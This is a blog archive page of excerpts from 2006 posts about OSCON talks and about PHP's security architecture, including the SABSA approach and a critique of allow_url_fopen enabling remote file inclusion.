OSCON 2006 – See you there!

Just a quick note as to the quietness of the blog. I’m working on a few things: my slides for OSCON (webappsec 150 tutorial, and updating my Ajax presentation to include the latest research and make it a bit more (ahem) controversial to liven things up) doing demos for the above my slides for OWASP […]

PHP Security Architecture: SABSA approach

There are only a few acknowledged industry security architectures. SABSA (best documented in Enterprise Security Architecture by Sherwood, Clark and Lynas) is probably the best known. The various artifacts from this architecture include: Each of these layers needs to be thought about in a considered way: (Business) Drivers Why do you want X / How […]

PHP Security Architecture – Contextual Overview

Overview The problem with PHP is that it has no security architecture. What do I mean by security architecture? A single pervasive vision for security, which will last for approximately five years with little or no design maintenance. A robust security architecture creates a balance between functionality and risk, and ensures that by default, simple […]

PHP Insecurity: Failure of Leadership

About a week or so ago, I wrote to webappsec in response to Yasuo Ohgaki (書かない日記) post about some issues with PHP’s security model. For some time, I’ve been worried about the direction of PHP. As many of you know, I helped write XMB Forum and now help write UltimaBB. XMB in particular is an […]

PHP Insecurity: File handling and remote code execution

One of the reasons that PHP applications feature so prominently on bugtraq is not particularly developer focussed, it is PHP’s fault. Today we look at the top reason: the semi-hidden world of allow_url_fopen, wrappers and pretty much all file orientated functions. The extraordinarily bad decision to make allow_url_fopen the default AND enable a host of functions to automatically “benefit” from these features causes the #1 security defect of 2005 – remote file inclusion. Read on for this rant. Warning – no solutions contained within.